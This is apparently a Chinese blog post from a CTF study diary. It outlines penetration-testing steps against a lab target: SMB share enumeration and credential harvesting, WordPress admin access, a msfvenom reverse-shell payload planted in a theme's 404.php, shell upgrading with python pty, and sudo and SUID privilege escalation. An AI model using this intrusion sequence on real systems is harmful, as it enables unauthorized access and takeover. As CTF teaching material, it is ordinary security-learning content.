我的CTF学习与教学之旅笔记3

3.SMB:端口139,445

查看:smbclinet -L IP

连接:smbclient '\\IP\路径'   或者 smbclient //IP地址//路径

smb>ls

smb>help

get 下载指定文件分析

deets.txt:里面有个12345密码,留着!!!

重点关注应用的配置文件:如wp_config.php

可能会发现mysql的用户名和密码

远程登录mysql试试:

mysql -h ip地址 -u Admin -p

不让远程登录,不行!!!!!

再试ssh服务是否可用:

ssh Admin@IP地址

用发现的密码登录试试,也不行!

但是,都要试试!!!!!!!


nmap -A -T4

接下来用searchsploit  服务版本信息

也没有有用的信息


利用dirb 、nikto探测网站

发现wp-admin:哇哈哈哈

#利用网站uplods的漏洞,上传反射文件,并在攻击机开始监听

上传点:

msfvenom -p 载荷 相关设置 -f 文件类型 >反射目标文件

攻击机使用exploit/multi/handler

设置载荷、配置主机、端口

并启动主机监听

随后:

利用wordpress漏洞:利用前面找到的mysql密码,登录WordPress后台

 

技巧:

优化终端:python -c "import pty;pty.spawn('/bin/bash')"

在appearence下修改404.php,内容为新建的反射文件内容

浏览该404.php文件,启动反射

提权:

利用su - root 提权

sudo -l 查看可以使用哪些命令

sudo 执行相关命令

sudo su 提升到root权限

find / -perm -4000 2>/dev/null   查看有root执行权限的命令

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值